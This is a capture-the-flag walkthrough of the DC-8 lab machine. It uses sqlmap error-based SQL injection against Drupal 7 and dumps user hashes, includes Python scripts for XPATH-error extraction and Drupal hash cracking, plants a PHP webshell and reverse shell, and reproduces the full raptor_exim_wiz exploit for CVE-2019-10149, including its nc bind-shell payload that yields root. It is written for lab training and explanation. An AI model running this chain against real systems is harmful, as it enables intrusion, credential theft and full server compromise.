DC-8 walkthrough
Information gathering
nmap scan: the target is 192.168.137.139, with ports 22 (SSH) and 80 (HTTP) open.
Browsing port 80 and fingerprinting the CMS identifies Drupal 7.
http://192.168.137.139/?nid=1
Pages are requested with a nid parameter. A node id that ends up in a database query is a natural SQL injection candidate, so that is where testing starts.
Testing for SQL injection
order by 1 returns normally while order by 2 errors, so the injected query selects a single column (this is a property of the query behind nid, not of the database).
Even when the injected query succeeds, nothing is echoed back in the page, so a UNION-based injection has nowhere to display its result.
That leaves error-based injection, where the result is carried out inside a database error message:
- Test: extract the database version
- Extract the current database name (d7db)
- Dump the table names in d7db straight from sqlmap: 88 tables, of which only the potentially useful ones are shown below

```
python .\sqlmap.py -u http://192.168.137.139/?nid=1 --random-agent -p nid --technique E --dbms mariadb -D d7db --tables --threads 10

Database: d7db
[88 tables]
+-----------------------------+
| block                       |
| cache                       |
| history                     |
| role                        |
| system                      |
| actions                     |
| authmap                     |
| batch                       |
| users                       |
| users_roles                 |
| variable                    |
| watchdog                    |
+-----------------------------+
```

- Dump the column names of the users table

```
python .\sqlmap.py -u http://192.168.137.139/?nid=1 --random-agent -p nid --technique E --dbms mariadb -D d7db -T users --columns --threads 10

Database: d7db
Table: users
[16 columns]
+------------------+------------------+
| Column           | Type             |
+------------------+------------------+
| data             | longblob         |
| language         | varchar(12)      |
| name             | varchar(60)      |
| status           | tinyint(4)       |
| access           | int(11)          |
| created          | int(11)          |
| init             | varchar(254)     |
| login            | int(11)          |
| mail             | varchar(254)     |
| pass             | varchar(128)     |
| picture          | int(11)          |
| signature        | varchar(255)     |
| signature_format | varchar(255)     |
| theme            | varchar(255)     |
| timezone         | varchar(32)      |
| uid              | int(10) unsigned |
+------------------+------------------+
```

- Dump the uid/name/status/access/pass columns of users

```
python .\sqlmap.py -u http://192.168.137.139/?nid=1 --random-agent -p nid --technique E --dbms mariadb -D d7db -T users -C uid,name,status,access,pass --dump --threads 10

Database: d7db
Table: users
[3 entries]
+-----+---------+----------+------------+---------------------------------------------------------+
| uid | name    | status   | access     | pass                                                    |
+-----+---------+----------+------------+---------------------------------------------------------+
| 0   | <blank> | 0        | 0          | <blank>                                                 |
| 1   | admin   | 1        | 1567766818 | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
| 2   | john    | 1        | 1567498512 | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF |
+-----+---------+----------+------------+---------------------------------------------------------+
```
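To make the error-based mechanic concrete, here is an added Python example (not code from this write-up and not sqlmap's own code) of the extraction loop that both the manual error-based tests and sqlmap's `--technique E` rely on: MariaDB's updatexml()/extractvalue() echo the offending XPath in an error message, but cut it to 32 characters, so the value is pulled 31 characters at a time behind a `~` marker. The target is simulated by `fake_target()`, which holds constructed sample values (the d7db name and a table list built from the names dumped above); the payload shape and the marker are assumptions, and the real injection context behind nid on DC-8 may need different quoting.

```python
"""Error-based (XPATH) SQL injection extraction, the mechanic behind sqlmap --technique E.

MySQL/MariaDB raise  XPATH syntax error: '<value>'  when updatexml()/extractvalue()
get an invalid XPath, but the echoed value is truncated to 32 characters.
One character is spent on a '~' marker, so data is read in 31-char windows.
"""
import re

WINDOW = 31  # 32-char error limit minus the 1-char marker
XPATH_RE = re.compile(r"XPATH syntax error: '~(.*?)'")


def build_payload(expr: str, offset: int) -> str:
    """Value for the nid parameter; 0x7e is '~' so the error is recognisably ours.
    (Assumed injection context: a bare numeric nid. Adjust quoting for the real target.)"""
    return f"1 and updatexml(1,concat(0x7e,substring(({expr}),{offset},{WINDOW})),1)"


def parse_error(body: str):
    """Pull the marked chunk out of a response body, or None if no XPATH error is present."""
    m = XPATH_RE.search(body)
    return None if m is None else m.group(1)


def extract(expr: str, send) -> str:
    """send(payload) -> response body. Walk the value in 31-char windows and stop at the
    first window that comes back short (an exact multiple of 31 costs one extra, empty, request)."""
    result, offset = "", 1
    while True:
        chunk = parse_error(send(build_payload(expr, offset)))
        if chunk is None:
            raise RuntimeError("no XPATH error in response; injection point is not error-based")
        result += chunk
        if len(chunk) < WINDOW:
            return result
        offset += WINDOW


# ---- constructed stand-in for the real d7db instance (sample data, not from the target) ----
FAKE_DB = {
    "database()": "d7db",
    "group_concat(table_name)": (
        "actions,authmap,batch,block,cache,history,role,system,users,users_roles,variable,watchdog"
    ),
}
SUBSTR_RE = re.compile(r"substring\(\((.+?)\),(\d+),(\d+)\)")


def fake_target(payload: str) -> str:
    """Behave like the vulnerable page: evaluate substring(expr, offset, len) and leak it in
    a MariaDB-style XPATH error, truncated to 32 characters exactly as the server would."""
    m = SUBSTR_RE.search(payload)
    expr, offset, length = m.group(1), int(m.group(2)), int(m.group(3))
    chunk = FAKE_DB[expr][offset - 1 : offset - 1 + length]   # SQL substring() is 1-based
    echoed = ("~" + chunk)[:32]
    return f"<h1>Error</h1>PDOException: SQLSTATE[HY000]: XPATH syntax error: '{echoed}'"


if __name__ == "__main__":
    print(extract("database()", fake_target))
    print(extract("group_concat(table_name)", fake_target))
```

Swap `fake_target` for a function that performs the real HTTP request and returns the body; everything else stays the same. A value containing a single quote would break `XPATH_RE` as written, which is one reason sqlmap wraps its chunks in its own delimiters.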
This gives two usernames and their password hashes (Drupal 7 `$S$` salted SHA-512). Crack them offline with john.
john's password comes out as turtle.
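As an added example (not from this write-up and not John the Ripper's code), here is the Drupal 7 `$S$` hash algorithm in Python, which shows why john can attack these offline: the stored hash carries its own salt and iteration count in its first 12 characters, so a candidate password is checked by recomputing the hash and comparing. The two hashes are the ones dumped above; the wordlist is constructed.

```python
"""Drupal 7 password hashes ($S$...) and an offline dictionary check against them.

Layout of a stored hash (55 chars):
  $S$           algorithm tag (phpass-style SHA-512)
  D             log2(iteration count) as an itoa64 digit -> 2**15 = 32768 rounds
  qupvJbxV      8-char salt
  mqjr6c...2vF  first 43 chars of a custom base64 of the final digest
"""
import hashlib
import hmac
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55  # Drupal keeps only the first 55 chars of setting+encoded digest


def _phpass_b64(data: bytes) -> str:
    """Drupal's _password_base64_encode(): phpass-style, little-endian 3-byte groups."""
    out, i, n = [], 0, len(data)
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= n:
            break
    return "".join(out)


def drupal7_hash(password: str, setting: str) -> str:
    """Recompute the hash of `password` under the 12-char setting prefix of a stored hash."""
    if not setting.startswith("$S$"):
        raise ValueError("not a Drupal 7 $S$ hash")
    count_log2 = ITOA64.index(setting[3])
    if not 7 <= count_log2 <= 30:  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
        raise ValueError("implausible iteration count")
    salt = setting[4:12].encode()
    pw = password.encode()
    digest = hashlib.sha512(salt + pw).digest()
    for _ in range(1 << count_log2):          # 32768 rounds for a 'D' hash
        digest = hashlib.sha512(digest + pw).digest()
    return (setting[:12] + _phpass_b64(digest))[:DRUPAL_HASH_LENGTH]


def verify(password: str, stored: str) -> bool:
    return hmac.compare_digest(drupal7_hash(password, stored), stored)


def crack(stored: str, wordlist: Iterable[str]) -> Optional[str]:
    """What john's drupal7 format does, minus the speed: try each word until one verifies."""
    for word in wordlist:
        if verify(word, stored):
            return word
    return None


# hashes dumped from the users table above
ADMIN_HASH = "$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z"
JOHN_HASH = "$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF"

if __name__ == "__main__":
    wordlist = ["password", "123456", "turtle", "admin"]   # constructed mini wordlist
    for name, h in (("admin", ADMIN_HASH), ("john", JOHN_HASH)):
        print(name, crack(h, wordlist))
```

The 32768 SHA-512 rounds are what make each guess cost something; john still gets through a wordlist quickly because the work is embarrassingly parallel and the salt is public. The admin hash does not fall to this mini wordlist, which matches the write-up only recovering john's password.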
getshell
Log in to the Drupal admin backend as john, edit a page's body, and switch its text format to PHP code (the PHP filter module), so the body is executed as PHP when the page is rendered.
Test the webshell: it works.
Connecting with AntSword fails, even with the session cookie added, so go straight to a reverse shell from the PHP page instead.
Privilege escalation
sudo -l prompts for a password, which we do not have for www-data. So start by listing SUID binaries.
The SUID binaries are the usual suspects. exim4 was SUID on DC-7 as well; it is a mail transfer agent, and a quick check online shows it has no built-in way to drop into a shell. It does, however, have a known CVE: the Exim 4.89 on this box falls in the 4.87 to 4.91 range hit by CVE-2019-10149, where a crafted recipient address is expanded by Exim and can run commands as root.
Copy the Exploit-DB script "Exim 4.87 - 4.91 - Local Privilege Escalation - Linux local Exploit" (raptor_exim_wiz) to a server you control, then fetch it from DC-8 with wget. Note that www-data cannot write to /var/www, so cd to /tmp before downloading.
chmod 755 the script and run it.
It errors out. The cause (an AI assistant pointed me to it) is that the file has Windows-style CRLF line endings: bash treats the trailing \r as part of each token (typically `$'\r': command not found`), so strip the \r first with sed. Since the script is then sourced with `.`, it runs inside the current shell; keep in mind that its usage() calls exit, which would close your reverse shell if the arguments are wrong.
```
www-data@dc-8:/tmp$ sed -i 's/\r$//' root.sh
www-data@dc-8:/tmp$ . root.sh

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi

Preparing setuid shell helper...
Problems compiling setuid shell helper, check your gcc.
Falling back to the /bin/sh method.

Delivering setuid payload...
220 dc-8 ESMTP Exim 4.89 Sat, 19 Apr 2025 14:43:49 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1u603R-0000IK-7Y
221 dc-8 closing connection

Waiting 5 seconds...
-rwxr-xr-x 1 www-data www-data 117208 Apr 19 14:43 /tmp/pwned
$ whoami
www-data
```
Running `. root.sh` as-is did not escalate. Reading the script explains what it tried: the default method is setuid. It compiles a tiny setuid(0) shell helper with gcc, and if gcc is unavailable it falls back to copying /bin/sh to /tmp/pwned; gcc is indeed missing on DC-8, which is the "Problems compiling" message above. Either way the SMTP payload is meant to make Exim run `chown root /tmp/pwned; chmod 4755 /tmp/pwned` as root (the `\x2f` and `\t` escapes in the `${run{...}}` string are just `/` and tab, encoded so the address parser accepts them; the 31 Received: headers push the message over Exim's received_headers_max so it is bounced, and the bounce processing is where the recipient address gets expanded with root privileges). The `ls -l` output is the real clue: /tmp/pwned is still owned by www-data with mode 755, so the chown/chmod had not run by the time the script checked after its 5-second wait, and the fallback /bin/sh copy simply ran as www-data. The gcc fallback itself is not the problem: a copied /bin/sh that had been made root-owned and setuid would have worked just as well. Re-running `ls -l /tmp/pwned` a little later shows whether the payload fired at all. The netcat method instead has Exim spawn `nc -lp 31337 -e /bin/sh` and connects to it, and that one succeeded on DC-8.

```bash
METHOD="setuid" # default method

PAYLOAD_SETUID='${run{\x2fbin\x2fsh\t-c\t\x22chown\troot\t\x2ftmp\x2fpwned\x3bchmod\t4755\t\x2ftmp\x2fpwned\x22}}@localhost'
PAYLOAD_NETCAT='${run{\x2fbin\x2fsh\t-c\t\x22nc\t-lp\t31337\t-e\t\x2fbin\x2fsh\x22}}@localhost'

# usage instructions
function usage()
{
    echo "$0 [-m METHOD]"
    echo
    echo "-m setuid : use the setuid payload (default)"
    echo "-m netcat : use the netcat payload"
    echo
    exit 1
}

# payload delivery
function exploit()
{
    # connect to localhost:25
    exec 3<>/dev/tcp/localhost/25

    # deliver the payload
    read -u 3 && echo $REPLY
    echo "helo localhost" >&3
    read -u 3 && echo $REPLY
    echo "mail from:<>" >&3
    read -u 3 && echo $REPLY
    echo "rcpt to:<$PAYLOAD>" >&3
    read -u 3 && echo $REPLY
    echo "data" >&3
    read -u 3 && echo $REPLY
    for i in {1..31}
    do
        echo "Received: $i" >&3
    done
    echo "." >&3
    read -u 3 && echo $REPLY
    echo "quit" >&3
    read -u 3 && echo $REPLY
}

# print banner
echo
echo 'raptor_exim_wiz - "The Return of the WIZard" LPE exploit'
echo 'Copyright (c) 2019 Marco Ivaldi'
echo

# parse command line
while [ ! -z "$1" ]; do
    case $1 in
        -m) shift; METHOD="$1"; shift;;
        * ) usage ;;
    esac
done
if [ -z $METHOD ]; then
    usage
fi

# setuid method
if [ $METHOD = "setuid" ]; then

    # prepare a setuid shell helper to circumvent bash checks
    echo "Preparing setuid shell helper..."
    echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" >/tmp/pwned.c
    gcc -o /tmp/pwned /tmp/pwned.c 2>/dev/null
    if [ $? -ne 0 ]; then
        echo "Problems compiling setuid shell helper, check your gcc."
        echo "Falling back to the /bin/sh method."
        cp /bin/sh /tmp/pwned
    fi
    echo

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_SETUID
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    echo "Waiting 5 seconds..."
    sleep 5
    ls -l /tmp/pwned
    /tmp/pwned

# netcat method
elif [ $METHOD = "netcat" ]; then

    # select and deliver the payload
    echo "Delivering $METHOD payload..."
    PAYLOAD=$PAYLOAD_NETCAT
    exploit
    echo

    # wait for the magic to happen and spawn our shell
    echo "Waiting 5 seconds..."
    sleep 5
    nc -v 127.0.0.1 31337

# print help
else
    usage
fi
```
Escalating with the netcat method succeeds:

```
www-data@dc-8:/tmp$ . root.sh -m netcat

raptor_exim_wiz - "The Return of the WIZard" LPE exploit
Copyright (c) 2019 Marco Ivaldi

Delivering netcat payload...
220 dc-8 ESMTP Exim 4.89 Sat, 19 Apr 2025 14:48:15 +1000
250 dc-8 Hello localhost [::1]
250 OK
250 Accepted
354 Enter message, ending with "." on a line by itself
250 OK id=1u607j-0000Iz-Vm
221 dc-8 closing connection

Waiting 5 seconds...
localhost [127.0.0.1] 31337 (?) open
whoami
root
```
Flag

```
cat /root/flag.txt
```